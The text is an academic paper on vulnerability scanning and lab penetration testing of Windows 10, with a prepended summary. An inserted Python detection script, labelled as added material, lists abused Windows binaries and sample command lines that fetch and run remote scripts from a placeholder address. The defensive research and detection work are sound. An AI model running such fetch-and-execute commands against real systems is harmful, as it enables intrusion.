Windows 10 Operating System Vulnerability Assessment and Exploitation

The document discusses a study that assessed vulnerabilities in the Windows 10 operating system. The researchers used tools like CVE data, Metasploit, Nmap, and Netcat to identify vulnerabilities and attempt attacks against different Windows 10 versions. They tested eight attacks, two of which were successful. Installing the latest Windows 10 version did not prevent all attacks. Further research is needed to fully assess Windows 10 vulnerabilities and recommend better security solutions.

21st International Symposium INFOTEH-JAHORINA, 16-18 March 2022

Windows 10 Operating System: Vulnerability Assessment and Exploitation

Jasmin Softić, Zanin Vejzović


Faculty of Computer Science
Sarajevo School of Science and Technology
71000 Sarajevo, Bosnia and Herzegovina
[email protected] / [email protected]

2022 21st International Symposium INFOTEH-JAHORINA (INFOTEH) | 978-1-6654-3778-3/22/$31.00 ©2022 IEEE | DOI: 10.1109/INFOTEH53737.2022.9751274

Abstract— The study focused on assessing and testing Windows 10 to identify possible vulnerabilities and its ability to withstand cyber-attacks. CVE data, alongside other vulnerability reports, were instrumental in measuring the operating system’s performance. Metasploit and Nmap were essential in penetration and intrusion experiments in a simulated environment. The study applied the following testing procedure: information gathering, scanning and results analysis, vulnerability selection, launch attacks, and gaining access to the operating system. Penetration testing involved eight attacks, two of which were effective against the different Windows 10 versions. Installing the latest version of Windows 10 did not guarantee complete protection against attacks. Further research is essential in assessing the system’s vulnerabilities and recommending better solutions.

Keywords: Windows 10, Vulnerability Assessment, Vulnerability, cyber-attack.

I. INTRODUCTION

Malicious software is intended to cause harm to computer systems or people. However, a developer can use malicious software to test system vulnerability during penetration testing – a form of ethical hacking – as part of the operating system (OS) patching procedure. Anti-viruses are an essential line of defense against harmful actors and programs, and standard OSs like Windows 10 have them pre-installed.

Over the years, Microsoft has improved Windows 10 by introducing more features. The extra features encourage hackers to look for vulnerabilities. Software engineers constantly secure systems, and Windows 10 developers are part of the solution. The underlying challenge is creating an excellent user experience while securing the OS simultaneously. Regular vulnerability assessment is one of the techniques to deter invader activity. Vulnerability and penetration testing are practical assessment methods for eliminating bugs and security loopholes.

The purpose of this research was to uncover weak areas in newly installed Windows 10 utilizing both paid and free, open-source tools to understand probable attack scenarios better. Another goal was to show that default protection and settings cannot fully protect against cyber-attacks. This study examined various versions of Windows 10 and Kali Linux tools like msfvenom, Metasploit framework, Nmap, and Netcat to exploit the system’s vulnerabilities.

II. WINDOWS 10 AND SECURITY ASSESSMENT

There are numerous computer OSs, but only four are in the mainstream – Microsoft Windows, Mac OS X, Linux, and Unix. Windows 10 was released on July 29, 2015, and Microsoft claims it was installed on more than 110 million devices three months later [1]. Today, 1.3 billion users use Windows 10 [2], representing 79.84% of the OS market share worldwide [3], making it the world’s most popular desktop OS.

Windows 10 is built on Windows NT technology, allowing users to easily interact with the OS within the enterprise and personal computing environments. The system leverages an incremental development approach achieved from the updates of previous versions like Windows 8.1 [1]. The incremental approach enables Microsoft to quickly resolve security issues and performance constraints identified in the earlier versions of the software. It also allows users to update their desktop OSs easily, with minimal compatibility setbacks.

The prevalence of Windows 10 among organizations and personal users makes it susceptible to increasing cyber-attacks. Any user is vulnerable to cyber security threats, necessitating preventive measures through a vulnerability assessment. Attackers often breach systems remotely or use malicious software to exploit flaws. Evaluating possible OS attack vectors includes testing bugs and examining vulnerability vectors [4]. Defenders must develop and deploy software patches following software release and progressively facilitate system updates to address the emerging cyber security threats.

A review of vulnerabilities in CVE Details – the ultimate system security vulnerability data source – provided essential information for assessing Windows 10 performance against specific vulnerabilities. The repository’s significance involved its consistency and accuracy in exposure updates, allowing researchers to grasp emerging concerns across platforms better. A review of vulnerability reports from Windows 7, Windows 8, Windows 8.1, and Windows 10 from [5], [6], [7], and [8] led to significant vulnerability insight.

Authorized licensed use limited to: Universitas Indonesia. Downloaded on December 06,2023 at 04:35:48 UTC from IEEE Xplore. Restrictions apply.
Windows 7 had 1924 vulnerabilities [5], Windows 8 had 252 [6], Windows 8.1 had 1719 flaws [7], and Windows 10 had 2394 security issues [8] (see Figure 1).

Figure 1. Vulnerabilities in Windows OSs

Evaluating Windows 10 security issues based on threat type sought to group them based on the nature of the attack. The evaluation was instrumental in providing a deeper understanding of security measures needed to remediate the vulnerabilities (see Figure 2).

Figure 2. Grouping of Windows 10 vulnerabilities

III. RELATED WORKS

There is limited research on Windows 10 vulnerability and security assessment. Microsoft Windows is vulnerable to various remote and local attacks [9]. Most attacks involve website access, sending an email, logging in, downloading malicious files, and altering registry keys. Essentially, most users encounter and grant malicious software access into their systems without even knowing.

A cyber-attack is a malicious code or practice meant to change, exploit, deny, or destroy valuable data and information in computers and networks [10]. An excellent instance of malware is Flame – a Microsoft Windows malware used to assault Middle Eastern countries in 2012. Another malware is the Duqu malware, which also targets Microsoft Windows OS by exploiting a hole in the Win32k.sys component of Windows.

The Red Canary [11] reported that out of 20 000 confirmed threats across their customers’ environment, the most frequent techniques for attacking Windows after mapping with MITRE ATT&CK were as follows:

• T1059 – Command and Scripting Interpreter 24%
• T1218 – Signed Binary Proxy Execution 19%
• T1543 – Create or Modify System Process 16%
• T1053 – Scheduled Task/Job 16%
• T1003 – OS Credential Dumping 7%
• T1055 – Process Injection 7%
• T1027 – Obfuscated Files or Information 6%
• T1105 – Ingress Tool Transfer 5%
• T1569 – System Services 4%

Another study involving a classification framework for distinct cyber-attack occurrence patterns found that three of the top seven cyber-attacks are linked to Microsoft Windows (RDP, WinEXE, WinDLL) [12].

From 2007 to 2018, researchers focused on Microsoft Windows malware by observing malware families. Aidan et al. [13] conducted a ransomware assault survey, citing the following malware as the most dangerous: CryptoWall, CTB-Locker, Locky, WannaCry (125 000 organizations in 150 countries affected), and 2017 Petya (64 countries affected), all of which target Windows users. Regular patching of Microsoft Windows could prevent attacks that affected millions of machines globally. Even with a strong firewall, a Windows OS can hardly detect and stop various cyber-attacks, such as Denial of Service attacks (DoS) [14].

The introduction of a new Windows Defender Centre in Windows 10 was instrumental in improving the system’s security by detecting security threats through event log optimization [15]. Windows Defender Centre gives users control and visibility of device security through five pillars: virus and threat protection, device performance and health, firewall and network protection, app and browser control, and family options. Dodge et al. [16] used live virtual machine introspection to simulate a Windows-based cyber-attack. Based on the simulation, Windows-specific data structures enable this type of assault by bringing essential information from a Windows memory dump utilizing forensic analysis tools.

Adversaries can infiltrate an organization’s network by exploiting vulnerabilities in Windows OS. Razaque et al. [17] published a report on medical cyber security attacks, expressing concern about Windows OS vulnerabilities that pose a security risk to medical institutions. The threats include the WannaCry ransomware vulnerability or the presence of a Server Message Block vulnerability that allows an attacker to launch the EternalBlue attack. Many companies, such as Tenable, offer automated vulnerability assessment solutions to help organizations test their environments for flaws. Also, Harrell et al. [18] examined the vulnerability of a higher education institution using Nessus and Burp scanners. The assessment revealed that Windows OS had critical flaws, making it susceptible to cyber-attacks.
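
As an added example (not code from the paper or from Red Canary), the sketch below shows how a defender could flag the signed Windows binaries named in Table 3 of Section V in process-creation telemetry, tagging each alert with an ATT&CK ID from the ranking in [11]. The event tuples, host names, addresses and the two heuristics are constructed assumptions; the field order follows Sysmon Event ID 1 (ParentImage, Image, CommandLine).

```python
import re
from collections import Counter
from ntpath import basename  # parses Windows paths on any platform

# Binaries from Table 3 plus the two interpreters behind the batch-file and
# PowerShell tests. T1218 and T1059 appear in the ranking from [11];
# T1047 (Windows Management Instrumentation) is not on the page.
WATCHLIST = {
    "mshta.exe": "T1218", "rundll32.exe": "T1218", "regsvr32.exe": "T1218",
    "msiexec.exe": "T1218", "cscript.exe": "T1059", "cmd.exe": "T1059",
    "powershell.exe": "T1059", "wmic.exe": "T1047",
}
# Signal 1 (assumed heuristic): the command line references a URL or UNC share.
REMOTE = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\[\w$.-]+")
# Signal 2 (assumed heuristic): the parent is a document or mail client.
ODD_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}

def triage(events):
    """Return one alert per event where a watchlisted binary shows a signal."""
    alerts = []
    for host, parent, image, cmdline in events:
        name = basename(image).lower()
        technique = WATCHLIST.get(name)
        if technique is None:
            continue  # binary is not on the watchlist
        reasons = []
        if REMOTE.search(cmdline):
            reasons.append("remote-resource")
        if basename(parent).lower() in ODD_PARENTS:
            reasons.append("unusual-parent")
        if reasons:
            alerts.append({"host": host, "technique": technique,
                           "image": name, "reasons": reasons})
    return alerts

def by_technique(alerts):
    """Count alerts per ATT&CK technique ID."""
    return Counter(a["technique"] for a in alerts)

# Constructed sample records: (host, ParentImage, Image, CommandLine)
SAMPLE_EVENTS = [
    ("WS-01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     r"mshta.exe http://192.0.2.10/update.hta"),
    ("WS-01", r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /V"),
    ("WS-02", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Users\Public\run.bat"),
    ("WS-02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
    ("WS-03", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cscript.exe",
     r"cscript.exe \\192.0.2.10\share\job.vbs"),
    ("WS-03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
     r"notepad.exe C:\Users\Public\notes.txt"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Routine use of the same binaries (the installer service start, a control-panel applet) produces no alert, which is the point of pairing the watchlist with a second signal.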

IV. EXPERIMENTAL SETUP AND ANALYSIS

A. Proposed Method

Investigating different scenarios and attack types is a necessary initial step in defending Windows 10 against cyber-attacks. The general attack process used in this research is shown in Figure 3.

Figure 3. Attack process

The steps in Figure 3 are described below:

• Information Gathering – Information gathering precedes any assault. Data collection includes passive data, such as publicly available information on the target.
• Scanning & Result Analysis – Vulnerability analysis starts at this phase. Nessus Pro and Nmap were instrumental in assessing how a target reacts to incursions.
• Vulnerability Selection – This phase is integral in identifying easily exploited vulnerabilities against the target. Nessus Pro classified vulnerabilities as High, Medium, Normal, Low, or Info using CVSS v3.0.
• Launching Attack – MSFVenom from Metasploit, which combines the msfpayload and msfencode tools into a single framework, was instrumental in generating malicious files that were injected and executed on the Windows 10 machines. The attacker established a shell connection to the attacker’s Kali Linux machine.
• Gaining Access – Following a successful assault, the attacker used various tools to analyze the system, obtaining desirable outcomes.

B. Lab Setup and Analysis

The workstation used for the experimental part is an HP Z8 Workstation with Windows 10 Pro; its details are provided in Table 1.

Table 1. Workstation Details

| Device | Specifications |
|---|---|
| CPU | Intel(R) Silver 4210 CPU @ 2.20 GHz |
| RAM | 32 GB |
| System Type | 64-bit OS, x64-based processor |
| Graphics Card | NVIDIA Quadro P1000 |

VMWare Workstation Pro 15.5 helped set up a virtual environment to analyze Windows 10 for vulnerabilities, resulting in five virtual machines (see Table 2). No third-party software, updates, or patches were applied when installing the OS on VMs 2, 3, and 4.

Kali Linux 2021.3 was the attacker on VM 1, while VM 5 configuration involved Nessus Professional Version 8.15.2 with the latest upgrade for Nessus plugins performed on October 21, 2021. Network configuration used a host-only network.

Table 2. Lab setup details

| # | VM Name | OS | Version | IP Address |
|---|---|---|---|---|
| 1 | Kali Linux | Linux | 2021.3 | 192.168.1.104 |
| 2 | Windows 10 E – SSST – L1 | Windows 10 Education | 20H2 19042.1237 | 192.168.1.100 |
| 3 | Windows 10 – Pro – SSST-L2 | Windows 10 Pro | 20H2 19042.1237 | 192.168.1.101 |
| 4 | Windows 10 ENT – SSST-L3 | Windows 10 Enterprise | 20H2 19042.1237 | 192.168.1.102 |
| 5 | Windows 10 - Nessus | Windows 10 Pro | 20H2 19042.1237 | 192.168.1.103 |

Figure 4. Lab Setup for Testing Environment

C. Vulnerability Assessment

Each Windows system was scanned with the Nessus Professional scanner with the following parameters:

1st Scan – Non-credential scan, IP range 192.168.1.100-102.

2nd Scan – Credential scan, IP range 192.168.1.100-102.

Non-credential scan results per machine, utilizing the latest CVSS v3.0 updates (see Figure 6).

Figure 5. Non-Credential Nessus scan result

Credential scan results are as shown in Figure 7:

Figure 6. Credential Nessus Scan results

With the Nessus scanner, no high or critical vulnerabilities were identified. There was 1 Medium finding related to SMB signing and 37 informative ones.

Then, a port scan using Nmap on Linux was run with the parameters nmap -sV 192.168.1.100-102 (see Figure 7).

Figure 7. Nmap Scan Result

The Nmap scan utilized the vulscan script, which hosts CVE databases on our Kali Linux machine. The script includes the following databases: scipvuldb.csv, cve.csv, securityfocus.csv, xforce.csv, exploitdb.csv, openvas.csv, securitytracker.csv, osvdb.csv. The second Nmap scan, with the vulscan script, found no relationship to CVEs from well-known databases.

V. RESULTS AND DISCUSSION

Turning off the firewall and anti-virus and avoiding third-party software without patching showed that each version of Windows 10 does not have OS-level vulnerabilities.

Running specially crafted malicious files on different Windows 10 machines in eight simulations showed that Windows 10 has a relatively reliable defense mechanism. Of the eight malicious command attacks, only the Batch File attack and the PowerShell attack succeeded, each compromising two systems, as depicted in Table 3.

Table 3. Attack simulation results

| Technique Name | Windows 10 Education (L1) | Windows 10 Pro (L2) | Windows 10 Enterprise (L3) |
|---|---|---|---|
| Batch File | compromised | not compromised | compromised |
| Mshta | not compromised | not compromised | not compromised |
| Powercat | compromised | not compromised | compromised |
| Rundll32 | not compromised | not compromised | not compromised |
| Regsvr32 | not compromised | not compromised | not compromised |
| Cscript | not compromised | not compromised | not compromised |
| Msiexec | not compromised | not compromised | not compromised |
| Wmic | not compromised | not compromised | not compromised |

Most attacks are caused by a user’s lack of security knowledge. This study assumed the worst-case scenario where the user switched off the firewall and antivirus. Tests on different versions of Windows 10 found that two of the eight attacks were effective. Not all versions of Windows are susceptible to all cyber-attacks.

VI. CONCLUSION

Freely available technologies are essential to discovering flaws in Windows 10, implying that systems are vulnerable to unauthorized exploitation by third parties. Limitations in user security awareness and vulnerabilities in the OS and other software are the primary causes of system compromise. According to [19], which compared the severity of vulnerabilities in Windows, Ubuntu, RedHat, Novell, MacOS and Solaris, the most severe vulnerabilities have been discovered in Windows OS.

A future study should explore different attack approaches using various tools. Finally, the study will create a program that can automatically detect attacks and recommend the best mitigation and prevention practices.

VII. REFERENCES

[1] E. Bott, “Introducing Windows 10 for IT Professionals,” Microsoft Press, 2016.
[2] Microsoft, “Story Labs,” Monday, 18 October 2021. [Online]. Available: https://news.microsoft.com/bythenumbers/en/windowsdevices.

[3] StatCounter, “GlobalStats,” September 2021. [Online]. Available: https://gs.statcounter.com/os-version-market-share/windows/desktop/worldwide.
[4] Ö. Aslan and R. Samet, “Mitigating Cyber Security Attacks by being Aware of Vulnerabilities and Bugs,” in 2017 International Conference on Cyberworlds, 2017.
[5] CVE Details - Windows 7, “Vulnerability Statistics,” 2021. [Online]. Available: https://www.cvedetails.com/product/17153/Microsoft-Windows-7.html?vendor_id=26. [Accessed 14 October 2021].
[6] CVE Details - Windows 8, “Vulnerability Statistics,” 2021. [Online]. Available: https://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26. [Accessed 14 October 2021].
[7] CVE Details - Windows 8.1, “Vulnerability Statistics,” 2021. [Online]. Available: https://www.cvedetails.com/product/26434/Microsoft-Windows-8.1.html?vendor_id=26. [Accessed 14 October 2021].
[8] CVE Details - Windows 10, “Vulnerability Statistics,” 2021. [Online]. Available: https://www.cvedetails.com/product/32238/Microsoft-Windows-10.html?vendor_id=26. [Accessed 14 October 2021].
[9] K. Dashora, D. S. Tomar and J. Rana, “A Practical Approach for Evidence Gathering in Windows,” International Journal of Computer Applications (0975 – 8887), no. Volume 5 - No.10, August 2010.
[10] P. Arora and A. Dhar, “Cyber Attacks: Operation and Prevention,” International Journal of Engineering Applied Sciences and Technology, vol. 1, no. 12, pp. 93-96, 2016.
[11] Red Canary, “2021 Threat Detection Report,” Red Canary, 2021.
[12] M. S. K. Awan, M. AlGhamdi, S. AlMotiri, P. Burnap and O. Rana, “A classification framework for distinct cyber-attacks based on occurrence patterns,” Sochi, Russia, 2015.
[13] J. S. Aidan, H. K. Verma and L. K. Awasthi, “Comprehensive Survey on Petya Ransomware Attack,” in 2017 International Conference on Next Generation Computing and Information Systems (ICNGCIS), 2017.
[14] N. Naik, P. Jenkins, R. Cooke, D. Ball, A. Foster and Y. Jin, “Augmented windows fuzzy firewall for preventing denial of service attack,” in 2017 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE), 2017.
[15] J. Baráth, “Optimizing windows 10 logging to detect network security threats,” in 2017 Communication and Information Technologies (KIT), Vysoke Tatry, Slovakia, 2017.
[16] D. A. Dodge, B. E. Mullins, G. L. Peterson and J. S. Okolica, “Simulating windows-based cyber attacks using live virtual machine introspection,” in Proceedings of the 2010 Summer Computer Simulation Conference, Ottawa, Ontario, Canada, 2010.
[17] A. Razaque, F. Amsaad, M. J. Khan, S. Hariri, S. Chen, C. Siting and X. Ji, “Survey: Cybersecurity Vulnerabilities, Attacks and Solutions in the Medical Domain,” IEEE Access, vol. 7, 2019.
[18] C. R. Harrell, M. Patton, H. Chen and S. Samtani, “Vulnerability Assessment, Remediation, and Automated Reporting: Case Studies of Higher Education Institutions,” in 2018 IEEE International Conference on Intelligence and Security Informatics (ISI), Miami, FL, USA, 2018.
[19] A. Gorbenko, A. Romanovsky, O. Tarasyuk and O. Biloborodov, “Experience Report: Study of Vulnerabilities of Enterprise Operating Systems,” in 2017 IEEE 28th International Symposium on Software Reliability Engineering, 2017.
